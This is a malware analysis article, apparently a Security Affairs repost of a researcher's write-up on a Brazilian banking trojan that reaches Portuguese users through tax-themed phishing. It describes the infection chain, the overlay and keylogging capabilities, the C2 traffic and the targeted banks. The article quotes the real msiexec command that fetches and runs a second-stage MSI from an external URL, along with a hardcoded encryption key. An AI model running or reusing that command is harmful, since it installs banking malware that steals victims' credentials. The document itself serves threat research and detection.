Malware

Brazilian trojan impacting Portuguese users and using the same capabilities seen in other Latin American threats

Brazilian trojan impacting Portuguese users and using the same capabilities seen in other Latin American threats

Introduction

A new variant of a Brazilian trojan has impacted Internet end users in Portugal since last month (February 2022). Although there are no significant differences and sophistication in contrast to other well-known trojans such as MaxtrilhaURSA, and Javali, an analysis of the artifacts and IOCs obtained from this campaign is presented below.

Figure 1 below illustrates the high-level diagram of this new variant and how it operates.

Key findings

  • The trojan has been disseminated via phishing templates impersonating Tax services in Portugal.
  • An HTML file downloads a .lnk file mascaraed of an MSI file that takes advantage of the LoL bins to execute an MSI file (segunda.msi).
  • “segunda.msi” downloads and executes an EXE file that will drop the final stage.
  • The trojan itself installs or modifies Windows trusted certificates, checks by opening windows to perform banking windows overlay to steal credentials, and can deploy additional payloads executed via DLL injection technique.
  • The victims’ data is encrypted and sent to the C2 server geolocated in Russia.

Phishing wave

The malware takes advantage of a template from the Portuguese Tax services (Autoridade Tributária e Aduaneira) to disseminate the threat in the wild. Maxtrilha – one of the most active trojans in Portugal – uses the same templates to target users. We believe this can be a new variant from Maxtrilha. In addition, most artifacts extracted also matched a threat documented in 2020 and available here. This corroborates the share of code and TTP between Latin American threat groups.

Figure 2: Email template used to lure victims (Autoridade Tributária e Aduaneira – Portuguese Tax services).

The URL available on the email templates downloads an HTML file called “Dividas 2021.html” or “Financas.html” that will download a ZIP file from the Internet. Before downloading the file, the web server-side generates random filenames from a hardcoded list with values related to tax services in the Portuguese language, including: “Finanças.zip“, “divergencias.zip“, “Faturas.zip” and so on.

Figure 3: ZIP file downloaded from the Internet with an MSI file inside.

Playing with LOL bins 

After extracting the ZIP file, a .lnk file masked as an MSI is presented (Faturas.lnk – 490f5b97a2754e50a7b67f2e00d2b43b). This file takes advantage of a Living of the Land utility called “msiexec.exe” to download and execute in memory another MSI file (segunda.msi – a4b91a89b8d2bff27ed1e13e334109be8b207d48a6284f529391c5391d96f141). With this technique, the second MSI file executes in the background and downloads a new binary.”C:\Windows\System32\msiexec.exe” /i “https://cld.pt/dl/download/98c9149d-c4a5-4360-9097-90a12fa8d96f/sapotransfer-5d8a5a32728f4N2/segunda.msi?download=true

Figure 4: The second MSI file (a4b91a89b8d2bff27ed1e13e334109be8b207d48a6284f529391c5391d96f141) executes in the background and downloads a new binary (WpfApp14.exe).

At this moment, the infection chain is able to bypass the antivirus detection, with the latter EXE (WpfApp14.exe – 4eb39d47ef742996c02a886d56b97aedad904d85cd2ebd57000f6cbbfabe0ea0) with 0/90 detections in VirusTotal at the time of analysis (23-02-2022).

Figure 5: Trojan downloader (4eb39d47ef742996c02a886d56b97aedad904d85cd2ebd57000f6cbbfabe0ea0) with no detections in VirusTotal.

The intent of this binary is the download the last stage of the malware. The binary was developed in Visual Studio .NET and it has a lot of junk code to delay and make hard its analysis. However, somewhere inside the junk, the “FormPool” form is invoked. It downloads two EXE files, the last malware stage, and executes its “loader” (sear.exe).

Figure 6: Download of the next malware stages and execution of the trojan loader.

The last stage


Name: sear.exe
MD5: bc7600b038665c53e126ee1730ca39be


After downloading the two files (ptm.mp4 and teams.mp3), the previous executable renames the file “ptm.mp4” to “sear.exe” and executes it in memory (the trojan loader).

Figure 7: Sear.exe file – the trojan loader – is responsible for unzipping and executing the trojan itself.

Sear.exe is a loader developed in Delphi with the main purpose of extracting the final stage of 3 consecutive rounds of unzipping. The trojan itself is hidden and uses this multi-compression round approach to avoid detection. Finally, the WinEXEC API call is used to execute the trojan itself (teams.exe – ade4119d5fdf574ebe5055359ec7a5cd).

Figure 8: After some rounds of unzipping, the last malware stage is executed via WinExec Windows API call.


name: teams.exe
MD5 : ade4119d5fdf574ebe5055359ec7a5cd


The last malware stage is a Delphi file similar to other Latin American trojans, including the target banking strings found inside it. The main form “fCentral” is composed of 5 timers that will execute different tasks, including:

  • looking for opened windows matching the hardcoded strings and launches the overlay windows attack when the victim accesses specific home banking portals
  • collecting keystrokes and clipboard data (keylogger capabilities)
  • capturing screenshots and webcam
  • obtaining details about the machine, including hostname, AV, available drives, etc
  • hijack Windows trusted certificates to provide a proxy channel between criminals and infected machines

Figure 9: “fCentral” form where the malicious code is launched via separated timers.

The overlay process is quite simple and can be explained in Figure 10 below. In short, the trojan uses an ArrayList of target strings compared with the opened windows. If a match is found, the call “AddUsuario()” is invoked to add a new victim into the C2 server. Next, some details about the victim machine are collected, such as hostnamevolume information, data/time/region, and the name of the opened window.

Finally, the string is encrypted with a well-known algorithm used in different Latin American threats, and the content is sent to the C2 server.

Figure 10: High-level process of how this trojan adds new victims into the C2 server.

In detail, part of the encryption algorithm (DES+XOR)  is present below, and the encryption key found in this variant is the following:key=”YUQL23KL23DF90WI5E1JAS467NMCXXL6JAOAUWWMCL0AOMM4A4VZYW9KHJUI2347EJHJKDF3424SKL K3LAKDJSL9RTIKJ”

Figure 11: Pseudo-code of the encryption algorithm used to encrypt the communication between the infected machine and its C2 server.

Figure 12: Communication between the infected machine and the C2 server.

The full list of target banking organizations is presented below. It should be noted that most of the target banks are geo-located in Portugal, which indicates that this variant was specifically developed to be disseminated in Portugal.0073BE20 <UString> ‘accesoempresasbanca’0073BE54 <UString> ‘activobank’0073BE78 <UString> ‘aixadirecta’0073BE9C <UString> ‘articulares’0073BEC0 <UString> ‘bancanet’0073BEE0 <UString> ‘bancobest’0073BF00 <UString> ‘bancobpi’0073BF20 <UString> ‘bancoctt’0073BF40 <UString> ‘bancodecomerciohome’0073BF74 <UString> ‘bancomer’0073BF94 <UString> ‘bankia’0073BFB0 <UString> ‘bankinter’0073BFD0 <UString> ‘binance’0073BFEC <UString> ‘bitcoin’0073C008 <UString> ‘bpi’0073C01C <UString> ‘caempresas’0073C040 <UString> ‘caixaagricola’0073C068 <UString> ‘caixabank’0073C088 <UString> ‘caixadirectaonline’0073C0BC <UString> ‘canaisdigitais’0073C0E8 <UString> ‘caonline’0073C108 <UString> ‘citibanamex’0073C12C <UString> ‘digitalbanking’0073C158 <UString> ’empresas’0073C178 <UString> ‘eurobic’0073C194 <UString> ‘homebank’0073C1B4 <UString> ‘internetbanking’0073C1E0 <UString> ‘itoagricola’0073C204 <UString> ‘loginmillenniumbcp’0073C238 <UString> ‘logintoonlinebanking’0073C270 <UString> ‘metrobank’0073C290 <UString> ‘millennium’0073C2B4 <UString> ‘montepio’0073C2D4 <UString> ‘netbancoempresas’0073C304 <UString> ‘netbancoparticulares’0073C33C <UString> ‘novobanco’0073C35C <UString> ‘openbank’0073C37C <UString> ‘santander’0073C39C <UString> ‘banconacional’0073C3C8 <UString> ‘testetotal’0073C3EC <UString> ‘homebankinglogin’

As observed in other threats, including malware and phishing waves, Brazilian criminals are using C2 servers geo-located in Russia. This threat is a clear sign of this trend.

Figure 13: C2 server geo-located in Russia.

In addition, the trojan downloads another payload from a Brazilian domain that allows criminals to execute arbitrary code on the victim’s side. The data is downloaded into the “\Users\Public” folder in a form of a DLL PE file, and executed into the memory via the DLL injection technique. The rundll32.exe windows utility is used within this context to execute the target payload.

Figure 14: Additional payloads can be downloaded and executed on the target machine. 

Final Thoughts

Nowadays, we are facing a growing of Brazilian trojans at a very high speed. Each one of them with its peculiarities, TTPs, etc. With this in mind, criminals achieve a FUD condition that allows them to avoid detection and impact a large number of users around the world.

In this sense, monitoring these types of IoCs is a crucial point now, as it is expected that in the coming weeks or months new infections or waves can emerge.

Mitre Att&ck Matrix and Indicators of Compromise (IOCs) are available in the original post published by the cybersecurity researchers Pedro Tavares:

https://seguranca-informatica.pt/brazilian-trojan-impacting-portuguese-users-and-using-the-same-capabilities-seen-in-other-latin-american-threats/#.Yi8DxnpKi5e

About the author  Pedro Tavares:

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the security computer blog seguranca–informatica.pt.

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, Brazilian Trojan)

[adrotate banner=”5″]

[adrotate banner=”13″]

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.

Recent Posts

Cisco addressed high-severity flaws in IOS and IOS XE software

Cisco addressed multiple vulnerabilities in IOS and IOS XE software that can be exploited to…

5 hours ago

Google: China dominates government exploitation of zero-day vulnerabilities in 2023

Google's Threat Analysis Group (TAG) and Mandiant reported a surge in the number of actively…

12 hours ago

Google addressed 2 Chrome zero-days demonstrated at Pwn2Own 2024

Google addressed two zero-day vulnerabilities in the Chrome web browser that have been demonstrated during…

23 hours ago

INC Ransom stole 3TB of data from the National Health Service (NHS) of Scotland

The INC Ransom extortion group hacked the National Health Service (NHS) of Scotland and is threatening…

1 day ago

CISA adds Microsoft SharePoint bug disclosed at Pwn2Own to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft SharePoint vulnerability disclosed at the…

1 day ago

The DDR Advantage: Real-Time Data Defense

This is the advantage of Data Detection and Response (DDR) for organizations aiming to build…

1 day ago

This website uses cookies.